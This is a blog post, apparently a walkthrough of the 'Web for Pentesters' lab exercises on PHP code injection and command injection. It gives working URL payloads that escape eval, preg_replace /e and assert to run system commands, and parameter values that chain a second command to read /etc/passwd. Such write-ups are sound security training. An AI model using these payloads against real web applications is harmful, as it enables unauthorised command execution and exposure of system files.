Web for Pentesters 1- Code injection and Command Injection

In this section I’ll go through the code and command injection exercises. While code injection and command injection are very similar they differ in execution. In code injection, you deliver the command as part of the data you pass into the web app, i.e in the username field or comment section. In command injection, the web app excepts a certain command to be passed but another command is also inserted with it.

Code Injection

example 1:

name=hacker”.system(%27uname%20-a%27);//
                OR
name=hacker”.system(%27uname%20-a%27);#
The comment string, comments out the last of the code which helps escape the eval function and executes the uname -a command on the server returning the server software.

example 2:

example2.php?order=id);}system(%27uname%20-a%27);//
Here we’re closing out the php function, strcmp(), with the ) and closing out the user created function with the }.
After that, we can inject our system function which executes the uname -a command like before. Then commenting out the rest of the code.

example 3:

example3.php?new=hacker&pattern=/lamer/e&base=Hello%20lamer
place the e in-between / and &base to produce the error.
Basically this error means that the server is trying to execute the ‘hacker’ value, but can’t as it does not exist.
So know we can run any command just by replacing the value hacker with any command we want, like so:
example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
Displays the phpinfo page.
example3.php?new=system(%27uname%20-a%27)&pattern=/lamer/e&base=Hello%20lamer
This will run the uname -a command on the system and return the system name.

example 4:

adding ‘ or ” to the end of hacker will produce the error.
The assert function in php checks to see if the value passed in is false.
example4.php?name=hacker%27.phpinfo().%27
this will escape the assert function and execute the command, phpinfo, and display its contents to the web page.
Next up is command injection.

Command Injection

example 1:

example1.php?ip=127.0.0.1%26%26cat%20/etc/passwd
Basically there’s no validation or encoding here, so inserting %26%26cat /etc/passwd outputs the passwd file to the webpage.
%26%26=&&

example 2:

example2.php?ip=127.0.0.1%0acat%20/etc/passwd
Here you can by pass the the validation by passing the a newline encoding and passing in a new command.
n(new line) = %0a

example 3:

Using the telnet command, I was able to get the it to work.
telnet <vm’s ip> 80
Then pass in the command:
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0
This should display the system name in-between pre tags, towards the bottom of the output.
<span>%d</span> bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close